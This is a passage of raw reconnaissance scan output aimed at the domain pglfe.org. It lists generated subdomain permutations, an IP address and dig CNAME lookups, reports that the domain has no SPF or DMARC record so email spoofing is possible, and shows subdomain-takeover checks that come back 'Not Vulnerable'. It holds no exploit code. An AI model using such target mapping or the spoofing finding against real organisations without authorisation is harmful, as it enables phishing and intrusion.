2422www-brasil.pglfe.org
2423www.brasil.pglfe.org
2424wwwbrasil.pglfe.org
2425www-brazil.pglfe.org
2426www.brazil.pglfe.org
2427wwwbrazil.pglfe.org
2428www-bucket.pglfe.org
2429www.bucket.pglfe.org
2430wwwbucket.pglfe.org
2431www-bucky.pglfe.org
2432wwwbucky.pglfe.org
2433www-cdn.pglfe.org
2434www.cdn.pglfe.org
2435wwwcdn.pglfe.org
2436www-cert.pglfe.org
2437www.cert.pglfe.org
2438wwwcert.pglfe.org
2439www-cf.pglfe.org
2440www.cf.pglfe.org
2441wwwcf.pglfe.org
2442www-cgi.pglfe.org
2443www.cgi.pglfe.org
2444www.chd.pglfe.org
2445www-chef.pglfe.org
2446www.chef.pglfe.org
2447wwwchef.pglfe.org
2448www-ci.pglfe.org
2449www.ci.pglfe.org
2450wwwci.pglfe.org
2451www-client.pglfe.org
2452wwwclient.pglfe.org
2453www-cloudfront.pglfe.org
2454www.cloudfront.pglfe.org
2455wwwcloudfront.pglfe.org
2456www-cms1.pglfe.org
2457www.cms1.pglfe.org
2458wwwcms1.pglfe.org
2459www-cms.pglfe.org
2460www.cms.pglfe.org
2461wwwcms.pglfe.org
2462www-cn.pglfe.org
2463www.cn.pglfe.org
2464wwwcn.pglfe.org
2465www-com.pglfe.org
2466www.com.pglfe.org
2467wwwcom.pglfe.org
2468www-confluence.pglfe.org
2469wwwconfluence.pglfe.org
2470www-container.pglfe.org
2471www.container.pglfe.org
2472wwwcontainer.pglfe.org
2473www.control.pglfe.org
2474wwwcontrol.pglfe.org
2475www-c.pglfe.org
2476wwwc.pglfe.org
2477www-cvs.pglfe.org
2478www.cvs.pglfe.org
2479wwwcvs.pglfe.org
2480www-data.pglfe.org
2481www.data.pglfe.org
2482www-dec.pglfe.org
2483www.dec.pglfe.org
2484wwwdec.pglfe.org
2485www-demo.pglfe.org
2486www.demo.pglfe.org
2487www-dev1.pglfe.org
2488www.dev1.pglfe.org
2489wwwdev1.pglfe.org
2490www-developer.pglfe.org
2491wwwdeveloper.pglfe.org
2492www-development.pglfe.org
2493www.development.pglfe.org
2494www-devops.pglfe.org
2495www.devops.pglfe.org
2496wwwdevops.pglfe.org
2497www-dev.pglfe.org
2498www.dev.pglfe.org
2499wwwdev.pglfe.org
2500www.devs.pglfe.org
2501wwwdevs.pglfe.org
2502www-disabled.pglfe.org
2503www.disabled.pglfe.org
2504wwwdisabled.pglfe.org
2505www-docker.pglfe.org
2506www.docker.pglfe.org
2507wwwdocker.pglfe.org
2508www-docsdrop.pglfe.org
2509www.docsdrop.pglfe.org
2510www-docs.pglfe.org
2511www.docs.pglfe.org
2512wwwdocs.pglfe.org
2513www-drop.pglfe.org
2514wwwdrop.pglfe.org
2515www.edge.pglfe.org
2516wwwedge.pglfe.org
2517www-elasticbeanstalk.pglfe.org
2518www.elasticbeanstalk.pglfe.org
2519wwwelasticbeanstalk.pglfe.org
2520www-elastic.pglfe.org
2521www.elastic.pglfe.org
2522wwwelastic.pglfe.org
2523www-elb.pglfe.org
2524www.elb.pglfe.org
2525wwwelb.pglfe.org
2526wwwemail.pglfe.org
2527www-emea.pglfe.org
2528www.emea.pglfe.org
2529wwwemea.pglfe.org
2530www-engima.pglfe.org
2531www.engima.pglfe.org
2532wwwengima.pglfe.org
2533www-engineering.pglfe.org
2534www.engineering.pglfe.org
2535wwwengineering.pglfe.org
2536www-engine.pglfe.org
2537www.engine.pglfe.org
2538wwwengine.pglfe.org
2539www-eng.pglfe.org
2540www.eng.pglfe.org
2541wwweng.pglfe.org
2542www-eu.pglfe.org
2543www.eu.pglfe.org
2544wwweu.pglfe.org
2545www-europe.pglfe.org
2546www.europe.pglfe.org
2547wwweurope.pglfe.org
2548www-europewest.pglfe.org
2549www.europewest.pglfe.org
2550wwweuropewest.pglfe.org
2551www-euwe.pglfe.org
2552www.euwe.pglfe.org
2553wwweuwe.pglfe.org
2554www-euw.pglfe.org
2555www.euw.pglfe.org
2556wwweuw.pglfe.org
2557www-evelynn.pglfe.org
2558www.evelynn.pglfe.org
2559wwwevelynn.pglfe.org
2560www-events.pglfe.org
2561www.events.pglfe.org
2562wwwevents.pglfe.org
2563www-ext.pglfe.org
2564www.ext.pglfe.org
2565wwwext.pglfe.org
2566www-feb.pglfe.org
2567www.feb.pglfe.org
2568wwwfeb.pglfe.org
2569www-fet.pglfe.org
2570www.fet.pglfe.org
2571wwwfet.pglfe.org
2572www-firewall.pglfe.org
2573www.firewall.pglfe.org
2574wwwfirewall.pglfe.org
2575www.forms.pglfe.org
2576wwwforms.pglfe.org
2577www-forum.pglfe.org
2578www.forum.pglfe.org
2579wwwforum.pglfe.org
2580www-frontpage.pglfe.org
2581www.frontpage.pglfe.org
2582wwwfrontpage.pglfe.org
2583www-fw.pglfe.org
2584www.fw.pglfe.org
2585wwwfw.pglfe.org
2586www-games.pglfe.org
2587www.games.pglfe.org
2588wwwgames.pglfe.org
2589www.gateway.pglfe.org
2590wwwgateway.pglfe.org
2591www-germany.pglfe.org
2592www.germany.pglfe.org
2593wwwgermany.pglfe.org
2594www.ghcpi.pglfe.org
2595wwwghcpi.pglfe.org
2596www-gh.pglfe.org
2597www.gh.pglfe.org
2598wwwgh.pglfe.org
2599www-gist.pglfe.org
2600www.gist.pglfe.org
2601wwwgist.pglfe.org
2602www-github.pglfe.org
2603www.github.pglfe.org
2604www-gitlab.pglfe.org
2605www.gitlab.pglfe.org
2606wwwgitlab.pglfe.org
2607www-git.pglfe.org
2608www.git.pglfe.org
2609wwwgit.pglfe.org
2610www-global.pglfe.org
2611www.global.pglfe.org
2612wwwglobal.pglfe.org
2613www-gw.pglfe.org
2614www.gw.pglfe.org
2615wwwgw.pglfe.org
2616www-help.pglfe.org
2617www.help.pglfe.org
2618wwwhelp.pglfe.org
2619www-hkg.pglfe.org
2620www.hkg.pglfe.org
2621wwwhkg.pglfe.org
2622www-hwcdn.pglfe.org
2623www.hwcdn.pglfe.org
2624wwwhwcdn.pglfe.org
2625www-hw.pglfe.org
2626www.hw.pglfe.org
2627wwwhw.pglfe.org
2628www-iad.pglfe.org
2629www.iad.pglfe.org
2630wwwiad.pglfe.org
2631www-ids.pglfe.org
2632www.ids.pglfe.org
2633wwwids.pglfe.org
2634www.internal.pglfe.org
2635wwwinternal.pglfe.org
2636www-int.pglfe.org
2637www.int.pglfe.org
2638wwwint.pglfe.org
2639www-i.pglfe.org
2640www.i.pglfe.org
2641wwwi.pglfe.org
2642www.jenkins.pglfe.org
2643wwwjenkins.pglfe.org
2644www-jinx.pglfe.org
2645www.jinx.pglfe.org
2646wwwjinx.pglfe.org
2647www-july.pglfe.org
2648www.july.pglfe.org
2649wwwjuly.pglfe.org
2650www-june.pglfe.org
2651www.june.pglfe.org
2652wwwjune.pglfe.org
2653www-korea.pglfe.org
2654www.korea.pglfe.org
2655wwwkorea.pglfe.org
2656www-kor.pglfe.org
2657wwwkor.pglfe.org
2658www-kr.pglfe.org
2659www.kr.pglfe.org
2660wwwkr.pglfe.org
2661www-lab.pglfe.org
2662www.lab.pglfe.org
2663wwwlab.pglfe.org
2664www-lan.pglfe.org
2665www.lan.pglfe.org
2666wwwlan.pglfe.org
2667www-las.pglfe.org
2668www.las.pglfe.org
2669wwwlas.pglfe.org
2670www.latinamerica.pglfe.org
2671wwwlatinamerica.pglfe.org
2672www.latin.pglfe.org
2673wwwlatin.pglfe.org
2674www-lax1.pglfe.org
2675www.lax1.pglfe.org
2676wwwlax1.pglfe.org
2677www-lax.pglfe.org
2678wwwlax.pglfe.org
2679www-lb.pglfe.org
2680www.lb.pglfe.org
2681wwwlb.pglfe.org
2682www.legacy.pglfe.org
2683wwwlegacy.pglfe.org
2684www-loadbalancer.pglfe.org
2685www.loadbalancer.pglfe.org
2686wwwloadbalancer.pglfe.org
2687www-login.pglfe.org
2688www.login.pglfe.org
2689wwwlogin.pglfe.org
2690www-machine.pglfe.org
2691www.machine.pglfe.org
2692wwwmachine.pglfe.org
2693www-mail.pglfe.org
2694www.mail.pglfe.org
2695wwwmail.pglfe.org
2696www-march.pglfe.org
2697www.march.pglfe.org
2698wwwmarch.pglfe.org
2699www-merch.pglfe.org
2700www.merch.pglfe.org
2701wwwmerch.pglfe.org
2702www-metrics.pglfe.org
2703www.metrics.pglfe.org
2704wwwmetrics.pglfe.org
2705www-mirror.pglfe.org
2706www.mirror.pglfe.org
2707wwwmirror.pglfe.org
2708www-na.pglfe.org
2709www.na.pglfe.org
2710wwwna.pglfe.org
2711www-nautilus.pglfe.org
2712www.nautilus.pglfe.org
2713wwwnautilus.pglfe.org
2714wwwnetherlands.pglfe.org
2715www-net.pglfe.org
2716www.net.pglfe.org
2717wwwnet.pglfe.org
2718www.nginx.pglfe.org
2719wwwnginx.pglfe.org
2720www-nl.pglfe.org
2721www.nl.pglfe.org
2722wwwnl.pglfe.org
2723www-node.pglfe.org
2724www.node.pglfe.org
2725www-northamerica.pglfe.org
2726www.northamerica.pglfe.org
2727wwwnorthamerica.pglfe.org
2728www-nov.pglfe.org
2729www.nov.pglfe.org
2730wwwnov.pglfe.org
2731www-oceania.pglfe.org
2732www.oceania.pglfe.org
2733wwwoceania.pglfe.org
2734www-oct.pglfe.org
2735www.oct.pglfe.org
2736www-oid.pglfe.org
2737www.oid.pglfe.org
2738wwwoid.pglfe.org
2739www-ops.pglfe.org
2740www.ops.pglfe.org
2741wwwops.pglfe.org
2742www-org.pglfe.org
2743www.org.pglfe.org
2744wwworg.pglfe.org
2745www-origin.pglfe.org
2746www.origin.pglfe.org
2747www-page.pglfe.org
2748www.page.pglfe.org
2749wwwpage.pglfe.org
2750www-pantheon.pglfe.org
2751wwwpantheon.pglfe.org
2752www-partner.pglfe.org
2753www.partner.pglfe.org
2754wwwpartner.pglfe.org
2755www-pass.pglfe.org
2756www.pass.pglfe.org
2757wwwpass.pglfe.org
2758www-payment.pglfe.org
2759www.payment.pglfe.org
2760wwwpayment.pglfe.org
2761www-pay.pglfe.org
2762www.pay.pglfe.org
2763wwwpay.pglfe.org
2764www-pc.pglfe.org
2765wwwpc.pglfe.org
2766www.pglfe.org
2767www.php.pglfe.org
2768wwwphp.pglfe.org
2769www-pl.pglfe.org
2770www.pl.pglfe.org
2771wwwpl.pglfe.org
2772www-poland.pglfe.org
2773www.poland.pglfe.org
2774wwwpoland.pglfe.org
2775www-prd.pglfe.org
2776www.prd.pglfe.org
2777wwwprd.pglfe.org
2778www-preferences.pglfe.org
2779www.preferences.pglfe.org
2780www-preview.pglfe.org
2781www.preview.pglfe.org
2782wwwpreview.pglfe.org
2783www-private.pglfe.org
2784www.private.pglfe.org
2785wwwprivate.pglfe.org
2786www-priv.pglfe.org
2787www.priv.pglfe.org
2788wwwpriv.pglfe.org
2789www-prod.pglfe.org
2790www.prod.pglfe.org
2791wwwprod.pglfe.org
2792www-production.pglfe.org
2793wwwproduction.pglfe.org
2794www-productions.pglfe.org
2795www.productions.pglfe.org
2796www-profile.pglfe.org
2797www.profile.pglfe.org
2798www-profiles.pglfe.org
2799www.profiles.pglfe.org
2800wwwprofiles.pglfe.org
2801www-promo.pglfe.org
2802www.promo.pglfe.org
2803wwwpromo.pglfe.org
2804www-promotion.pglfe.org
2805www.promotion.pglfe.org
2806wwwpromotion.pglfe.org
2807www-proxy.pglfe.org
2808www.proxy.pglfe.org
2809www.raw.pglfe.org
2810wwwraw.pglfe.org
2811www-redirector.pglfe.org
2812www.redirector.pglfe.org
2813wwwredirector.pglfe.org
2814www-redir.pglfe.org
2815www.redir.pglfe.org
2816wwwredir.pglfe.org
2817www-region.pglfe.org
2818www.region.pglfe.org
2819wwwregion.pglfe.org
2820www.repo.pglfe.org
2821wwwrepo.pglfe.org
2822www-repository.pglfe.org
2823www.repository.pglfe.org
2824wwwrepository.pglfe.org
2825www-reset.pglfe.org
2826www.reset.pglfe.org
2827wwwreset.pglfe.org
2828www-restricted.pglfe.org
2829www.restricted.pglfe.org
2830wwwrestricted.pglfe.org
2831www-restrict.pglfe.org
2832www.restrict.pglfe.org
2833wwwrestrict.pglfe.org
2834www-reviews.pglfe.org
2835www.reviews.pglfe.org
2836www-s3.pglfe.org
2837www.s3.pglfe.org
2838wwws3.pglfe.org
2839www-sandbox.pglfe.org
2840wwwsandbox.pglfe.org
2841www-scm.pglfe.org
2842www.scm.pglfe.org
2843wwwscm.pglfe.org
2844www-search.pglfe.org
2845www.search.pglfe.org
2846wwwsearch.pglfe.org
2847www-secure.pglfe.org
2848www.secure.pglfe.org
2849wwwsecure.pglfe.org
2850www-security.pglfe.org
2851www.security.pglfe.org
2852wwwsecurity.pglfe.org
2853www-sept.pglfe.org
2854www.sept.pglfe.org
2855wwwsept.pglfe.org
2856www-server.pglfe.org
2857www.server.pglfe.org
2858wwwserver.pglfe.org
2859www-service.pglfe.org
2860www.service.pglfe.org
2861wwwservice.pglfe.org
2862www-signed.pglfe.org
2863www.signed.pglfe.org
2864wwwsigned.pglfe.org
2865www-singed.pglfe.org
2866www.singed.pglfe.org
2867wwwsinged.pglfe.org
2868www-skins.pglfe.org
2869www.skins.pglfe.org
2870www.s.pglfe.org
2871wwws.pglfe.org
2872www-spring.pglfe.org
2873wwwspring.pglfe.org
2874www-ssl.pglfe.org
2875www.ssl.pglfe.org
2876wwwssl.pglfe.org
2877www-staff.pglfe.org
2878www.staff.pglfe.org
2879wwwstaff.pglfe.org
2880www-stage1.pglfe.org
2881www.stage1.pglfe.org
2882wwwstage1.pglfe.org
2883www-stage.pglfe.org
2884www.stage.pglfe.org
2885wwwstage.pglfe.org
2886www-staging.pglfe.org
2887www.staging.pglfe.org
2888wwwstaging.pglfe.org
2889www-static.pglfe.org
2890www.static.pglfe.org
2891wwwstatic.pglfe.org
2892www-stg.pglfe.org
2893www.stg.pglfe.org
2894wwwstg.pglfe.org
2895www-support.pglfe.org
2896www.support.pglfe.org
2897wwwsupport.pglfe.org
2898www-svcgateway.pglfe.org
2899www.svcgateway.pglfe.org
2900wwwsvcgateway.pglfe.org
2901www-svc.pglfe.org
2902www.svc.pglfe.org
2903wwwsvc.pglfe.org
2904www-swagger.pglfe.org
2905wwwswagger.pglfe.org
2906www-system.pglfe.org
2907wwwsystem.pglfe.org
2908www-team.pglfe.org
2909www.team.pglfe.org
2910wwwteam.pglfe.org
2911www-test1.pglfe.org
2912www.test1.pglfe.org
2913wwwtest1.pglfe.org
2914www.testbed.pglfe.org
2915wwwtestbed.pglfe.org
2916www-testing1.pglfe.org
2917www.testing1.pglfe.org
2918wwwtesting1.pglfe.org
2919www-testing.pglfe.org
2920www.testing.pglfe.org
2921wwwtesting.pglfe.org
2922www-test.pglfe.org
2923www.test.pglfe.org
2924wwwtest.pglfe.org
2925www-tomcat.pglfe.org
2926www.tomcat.pglfe.org
2927wwwtomcat.pglfe.org
2928www-toolbar.pglfe.org
2929www.toolbar.pglfe.org
2930wwwtoolbar.pglfe.org
2931www-tpe.pglfe.org
2932www.tpe.pglfe.org
2933www-t.pglfe.org
2934wwwt.pglfe.org
2935www-training.pglfe.org
2936www.training.pglfe.org
2937wwwtraining.pglfe.org
2938www.train.pglfe.org
2939wwwtrain.pglfe.org
2940www-trial.pglfe.org
2941www.trial.pglfe.org
2942wwwtrial.pglfe.org
2943www-tr.pglfe.org
2944www.tr.pglfe.org
2945wwwtr.pglfe.org
2946www.turkey.pglfe.org
2947wwwturkey.pglfe.org
2948www.turk.pglfe.org
2949wwwturk.pglfe.org
2950wwwtur.pglfe.org
2951www-twitch.pglfe.org
2952www.twitch.pglfe.org
2953wwwtwitch.pglfe.org
2954www.uat.pglfe.org
2955www-us.pglfe.org
2956www.us.pglfe.org
2957wwwus.pglfe.org
2958www-v1.pglfe.org
2959www.v1.pglfe.org
2960wwwv1.pglfe.org
2961www-v2.pglfe.org
2962www.v2.pglfe.org
2963wwwv2.pglfe.org
2964www.v3.pglfe.org
2965www-vi.pglfe.org
2966www.vi.pglfe.org
2967wwwvi.pglfe.org
2968www-v.pglfe.org
2969www.v.pglfe.org
2970wwwv.pglfe.org
2971www-vpn.pglfe.org
2972www.vpn.pglfe.org
2973wwwvpn.pglfe.org
2974www-w3.pglfe.org
2975www.w3.pglfe.org
2976wwww3.pglfe.org
2977www-web1.pglfe.org
2978www.web1.pglfe.org
2979wwwweb1.pglfe.org
2980www-webapp.pglfe.org
2981www.webapp.pglfe.org
2982wwwwebapp.pglfe.org
2983www-web.pglfe.org
2984www.web.pglfe.org
2985wwwweb.pglfe.org
2986www-westeurope.pglfe.org
2987www.westeurope.pglfe.org
2988wwwwesteurope.pglfe.org
2989www-www3.pglfe.org
2990wwwwww3.pglfe.org
2991www-www.pglfe.org
2992www.www.pglfe.org
2993wwwwww.pglfe.org
2994www-z.pglfe.org
2995www.z.pglfe.org
2996wwwz.pglfe.org
2997z-www.pglfe.org
2998z.www.pglfe.org
2999zwww.pglfe.org
3000192.252.144.58
3001#######################################################################################################################################
3002[+] www.pglfe.org has no SPF record!
3003[*] No DMARC record found. Looking for organizational record
3004[+] No organizational DMARC record
3005[+] Spoofing possible for www.pglfe.org!
3006#######################################################################################################################################
3007; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> github-www.pglfe.org CNAME
3008;github-www.pglfe.org. IN CNAME
3009; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> github.www.pglfe.org CNAME
3010;github.www.pglfe.org. IN CNAME
3011; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> githubwww.pglfe.org CNAME
3012;githubwww.pglfe.org. IN CNAME
3013; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> www-github.pglfe.org CNAME
3014;www-github.pglfe.org. IN CNAME
3015; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> www.github.pglfe.org CNAME
3016;www.github.pglfe.org. IN CNAME
3017dig: '.www.pglfe.org' is not a legal name (empty label)
3018#######################################################################################################################################
3019[Not Vulnerable] 16.www.pglfe.org
3020[Not Vulnerable] 18-www.pglfe.org
3021[Not Vulnerable] 19-www.pglfe.org
3022[Not Vulnerable] 00.www.pglfe.org
3023[Not Vulnerable] 12www.pglfe.org
3024[Not Vulnerable] 15.www.pglfe.org
3025[Not Vulnerable] 13www.pglfe.org
3026[Not Vulnerable] 04.www.pglfe.org
3027[Not Vulnerable] 13.www.pglfe.org
3028[Not Vulnerable] 18.www.pglfe.org
3029[Not Vulnerable] 15-www.pglfe.org
3030[Not Vulnerable] 0.www.pglfe.org
3031[Not Vulnerable] 11.www.pglfe.org
3032[Not Vulnerable] 14www.pglfe.org
3033[Not Vulnerable] 03.www.pglfe.org
3034[Not Vulnerable] 12.www.pglfe.org
3035[Not Vulnerable] 16-www.pglfe.org
3036[Not Vulnerable] 16www.pglfe.org
3037[Not Vulnerable] 12-www.pglfe.org
3038[Not Vulnerable] 01.www.pglfe.org
3039[Not Vulnerable] 17-www.pglfe.org
3040[Not Vulnerable] 17www.pglfe.org
3041[Not Vulnerable] 18www.pglfe.org
3042[Not Vulnerable] 11www.pglfe.org
3043[Not Vulnerable] 11-www.pglfe.org
3044[Not Vulnerable] 19www.pglfe.org
3045[Not Vulnerable] 15www.pglfe.org
3046[Not Vulnerable] 10www.pglfe.org
3047[Not Vulnerable] 13-www.pglfe.org
3048[Not Vulnerable] 14-www.pglfe.org
3049[Not Vulnerable] 1.www.pglfe.org
3050[Not Vulnerable] 2009.www.pglfe.org
3051[Not Vulnerable] 2010www.pglfe.org
3052[Not Vulnerable] 2010.www.pglfe.org
3053[Not Vulnerable] 2010-www.pglfe.org
3054[Not Vulnerable] 2011.www.pglfe.org
3055[Not Vulnerable] 2012.www.pglfe.org
3056[Not Vulnerable] 2011www.pglfe.org
3057[Not Vulnerable] 2013.www.pglfe.org
3058[Not Vulnerable] 2013www.pglfe.org
3059[Not Vulnerable] 2012-www.pglfe.org
3060[Not Vulnerable] 2011-www.pglfe.org
3061[Not Vulnerable] 2013-www.pglfe.org
3062[Not Vulnerable] 1-www.pglfe.org
3063[Not Vulnerable] 2016www.pglfe.org
3064[Not Vulnerable] 2014.www.pglfe.org
3065[Not Vulnerable] 2016.www.pglfe.org
3066[Not Vulnerable] 2015.www.pglfe.org
3067[Not Vulnerable] 20.www.pglfe.org
3068[Not Vulnerable] 1www.pglfe.org
3069[Not Vulnerable] 2009www.pglfe.org
3070[Not Vulnerable] 2012www.pglfe.org
3071[Not Vulnerable] 2-www.pglfe.org
3072[Not Vulnerable] 2.www.pglfe.org
3073[Not Vulnerable] 2www.pglfe.org
3074[Not Vulnerable] 2015-www.pglfe.org
3075[Not Vulnerable] 2016-www.pglfe.org
3076[Not Vulnerable] 2014-www.pglfe.org
3077[Not Vulnerable] 20www.pglfe.org
3078[Not Vulnerable] 2009-www.pglfe.org
3079[Not Vulnerable] 3-www.pglfe.org
3080[Not Vulnerable] 3www.pglfe.org
3081[Not Vulnerable] 4www.pglfe.org
3082[Not Vulnerable] 3.www.pglfe.org
3083[Not Vulnerable] 4-www.pglfe.org
3084[Not Vulnerable] 4.www.pglfe.org
3085[Not Vulnerable] account-www.pglfe.org
3086[Not Vulnerable] account.www.pglfe.org
3087[Not Vulnerable] admin1.www.pglfe.org
3088[Not Vulnerable] acc.www.pglfe.org
3089[Not Vulnerable] accwww.pglfe.org
3090[Not Vulnerable] administrators-www.pglfe.org
3091[Not Vulnerable] admin1-www.pglfe.org
3092[Not Vulnerable] administrators.www.pglfe.org
3093[Not Vulnerable] 6-www.pglfe.org
3094[Not Vulnerable] 5-www.pglfe.org
3095[Not Vulnerable] 5.www.pglfe.org
3096[Not Vulnerable] 6.www.pglfe.org
3097[Not Vulnerable] 7-www.pglfe.org
3098[Not Vulnerable] 7.www.pglfe.org
3099[Not Vulnerable] 7www.pglfe.org
3100[Not Vulnerable] 8-www.pglfe.org
3101[Not Vulnerable] 8.www.pglfe.org
3102[Not Vulnerable] 9.www.pglfe.org
3103[Not Vulnerable] 8www.pglfe.org
3104[Not Vulnerable] 5www.pglfe.org
3105[Not Vulnerable] accept.www.pglfe.org
3106[Not Vulnerable] accept-www.pglfe.org
3107[Not Vulnerable] acceptwww.pglfe.org
3108[Not Vulnerable] accounting.www.pglfe.org
3109[Not Vulnerable] accountingwww.pglfe.org
3110[Not Vulnerable] accounts.www.pglfe.org
3111[Not Vulnerable] 9www.pglfe.org
3112[Not Vulnerable] accounting-www.pglfe.org
3113[Not Vulnerable] accounts-www.pglfe.org
3114[Not Vulnerable] accountswww.pglfe.org
3115[Not Vulnerable] 6www.pglfe.org
3116[Not Vulnerable] analytics-www.pglfe.org
3117[Not Vulnerable] analytics.www.pglfe.org
3118[Not Vulnerable] administratorswww.pglfe.org
3119[Not Vulnerable] administrator.www.pglfe.org
3120[Not Vulnerable] administrator-www.pglfe.org
3121[Not Vulnerable] admins-www.pglfe.org
3122[Not Vulnerable] administratorwww.pglfe.org
3123[Not Vulnerable] admins.www.pglfe.org
3124[Not Vulnerable] adminswww.pglfe.org
3125[Not Vulnerable] admin.www.pglfe.org
3126[Not Vulnerable] adm.www.pglfe.org
3127[Not Vulnerable] adm-www.pglfe.org
3128[Not Vulnerable] adminwww.pglfe.org
3129[Not Vulnerable] admwww.pglfe.org
3130[Not Vulnerable] akamai.www.pglfe.org
3131[Not Vulnerable] akamaiwww.pglfe.org
3132[Not Vulnerable] alpha.www.pglfe.org
3133[Not Vulnerable] alt.www.pglfe.org
3134[Not Vulnerable] alphawww.pglfe.org
3135[Not Vulnerable] america.www.pglfe.org
3136[Not Vulnerable] america-www.pglfe.org
3137[Not Vulnerable] akali-www.pglfe.org
3138[Not Vulnerable] americawww.pglfe.org
3139[Not Vulnerable] akaliwww.pglfe.org
3140[Not Vulnerable] altwww.pglfe.org
3141[Not Vulnerable] apache-www.pglfe.org
3142[Not Vulnerable] apache.www.pglfe.org
3143[Not Vulnerable] analyticswww.pglfe.org
3144[Not Vulnerable] apac-www.pglfe.org
3145[Not Vulnerable] admin-www.pglfe.org
3146[Not Vulnerable] apac.www.pglfe.org
3147[Not Vulnerable] apacwww.pglfe.org
3148[Not Vulnerable] apollo-www.pglfe.org
3149[Not Vulnerable] apiwww.pglfe.org
3150[Not Vulnerable] application.www.pglfe.org
3151[Not Vulnerable] apollo.www.pglfe.org
3152[Not Vulnerable] app.www.pglfe.org
3153[Not Vulnerable] app-www.pglfe.org
3154[Not Vulnerable] april.www.pglfe.org
3155[Not Vulnerable] aprilwww.pglfe.org
3156[Not Vulnerable] april-www.pglfe.org
3157[Not Vulnerable] authwww.pglfe.org
3158[Not Vulnerable] auth.www.pglfe.org
3159[Not Vulnerable] appwww.pglfe.org
3160[Not Vulnerable] auth-www.pglfe.org
3161[Not Vulnerable] aws-www.pglfe.org
3162[Not Vulnerable] awswww.pglfe.org
3163[Not Vulnerable] a.www.pglfe.org
3164[Not Vulnerable] awww.pglfe.org
3165[Not Vulnerable] azurewww.pglfe.org
3166[Not Vulnerable] backend-www.pglfe.org
3167[Not Vulnerable] a-www.pglfe.org
3168[Not Vulnerable] azure-www.pglfe.org
3169[Not Vulnerable] azure.www.pglfe.org
3170[Not Vulnerable] api1.www.pglfe.org
3171[Not Vulnerable] backendwww.pglfe.org
3172[Not Vulnerable] backend.www.pglfe.org
3173[Not Vulnerable] beta.www.pglfe.org
3174[Not Vulnerable] beta-www.pglfe.org
3175[Not Vulnerable] api1-www.pglfe.org
3176[Not Vulnerable] betawww.pglfe.org
3177[Not Vulnerable] api-www.pglfe.org
3178[Not Vulnerable] api-docs-www.pglfe.org
3179[Not Vulnerable] api.www.pglfe.org
3180[Not Vulnerable] api-docswww.pglfe.org
3181[Not Vulnerable] billing.www.pglfe.org
3182[Not Vulnerable] box-www.pglfe.org
3183[Not Vulnerable] brand-www.pglfe.org
3184[Not Vulnerable] boardswww.pglfe.org
3185[Not Vulnerable] billing-www.pglfe.org
3186[Not Vulnerable] boxwww.pglfe.org
3187[Not Vulnerable] brand.www.pglfe.org
3188[Not Vulnerable] brandwww.pglfe.org
3189[Not Vulnerable] billingwww.pglfe.org
3190[Not Vulnerable] boards-www.pglfe.org
3191[Not Vulnerable] brasil-www.pglfe.org
3192[Not Vulnerable] brasil.www.pglfe.org
3193[Not Vulnerable] brazil-www.pglfe.org
3194[Not Vulnerable] brazil.www.pglfe.org
3195[Not Vulnerable] application-www.pglfe.org
3196[Not Vulnerable] apollowww.pglfe.org
3197[Not Vulnerable] brasilwww.pglfe.org
3198[Not Vulnerable] brazilwww.pglfe.org
3199[Not Vulnerable] bucket-www.pglfe.org
3200[Not Vulnerable] bucky.www.pglfe.org
3201[Not Vulnerable] cert-www.pglfe.org
3202[Not Vulnerable] cert.www.pglfe.org
3203[Not Vulnerable] bucky-www.pglfe.org
3204[Not Vulnerable] buckywww.pglfe.org
3205[Not Vulnerable] cf.www.pglfe.org
3206[Not Vulnerable] b-www.pglfe.org
3207[Not Vulnerable] cdnwww.pglfe.org
3208[Not Vulnerable] cf-www.pglfe.org
3209[Not Vulnerable] ci.www.pglfe.org
3210[Not Vulnerable] ciwww.pglfe.org
3211[Not Vulnerable] client.www.pglfe.org
3212[Not Vulnerable] clientwww.pglfe.org
3213[Not Vulnerable] cloudfront-www.pglfe.org
3214[Not Vulnerable] client-www.pglfe.org
3215[Not Vulnerable] confluence.www.pglfe.org
3216[Not Vulnerable] container-www.pglfe.org
3217[Not Vulnerable] cloudfront.www.pglfe.org
3218[Not Vulnerable] cloudfrontwww.pglfe.org
3219[Not Vulnerable] confluencewww.pglfe.org
3220[Not Vulnerable] cms1-www.pglfe.org
3221[Not Vulnerable] containerwww.pglfe.org
3222[Not Vulnerable] control-www.pglfe.org
3223[Not Vulnerable] cms1www.pglfe.org
3224[Not Vulnerable] cms-www.pglfe.org
3225[Not Vulnerable] cms.www.pglfe.org
3226[Not Vulnerable] cnwww.pglfe.org
3227[Not Vulnerable] cn-www.pglfe.org
3228[Not Vulnerable] cmswww.pglfe.org
3229[Not Vulnerable] b.www.pglfe.org
3230[Not Vulnerable] control.www.pglfe.org
3231[Not Vulnerable] cdn-www.pglfe.org
3232[Not Vulnerable] cfwww.pglfe.org
3233[Not Vulnerable] cgiwww.pglfe.org
3234[Not Vulnerable] cgi.www.pglfe.org
3235[Not Vulnerable] chd-www.pglfe.org
3236[Not Vulnerable] chd.www.pglfe.org
3237[Not Vulnerable] chdwww.pglfe.org
3238[Not Vulnerable] chef.www.pglfe.org
3239[Not Vulnerable] chef-www.pglfe.org
3240[Not Vulnerable] chefwww.pglfe.org
3241[Not Vulnerable] cms1.www.pglfe.org
3242[Not Vulnerable] cn.www.pglfe.org
3243[Not Vulnerable] com-www.pglfe.org
3244[Not Vulnerable] confluence-www.pglfe.org
3245[Not Vulnerable] comwww.pglfe.org
3246[Not Vulnerable] devops.www.pglfe.org
3247[Not Vulnerable] devs-www.pglfe.org
3248[Not Vulnerable] cvs-www.pglfe.org
3249[Not Vulnerable] cvs.www.pglfe.org
3250[Not Vulnerable] controlwww.pglfe.org
3251[Not Vulnerable] cvswww.pglfe.org
3252[Not Vulnerable] c.www.pglfe.org
3253[Not Vulnerable] cwww.pglfe.org
3254[Not Vulnerable] c-www.pglfe.org
3255[Not Vulnerable] data.www.pglfe.org
3256[Not Vulnerable] data-www.pglfe.org
3257[Not Vulnerable] datawww.pglfe.org
3258[Not Vulnerable] decwww.pglfe.org
3259[Not Vulnerable] demo-www.pglfe.org
3260[Not Vulnerable] dec-www.pglfe.org
3261[Not Vulnerable] demo.www.pglfe.org
3262[Not Vulnerable] demowww.pglfe.org
3263[Not Vulnerable] domain
3264[Not Vulnerable] dev1.www.pglfe.org
3265[Not Vulnerable] developer-www.pglfe.org
3266[Not Vulnerable] developer.www.pglfe.org
3267[Not Vulnerable] development.www.pglfe.org
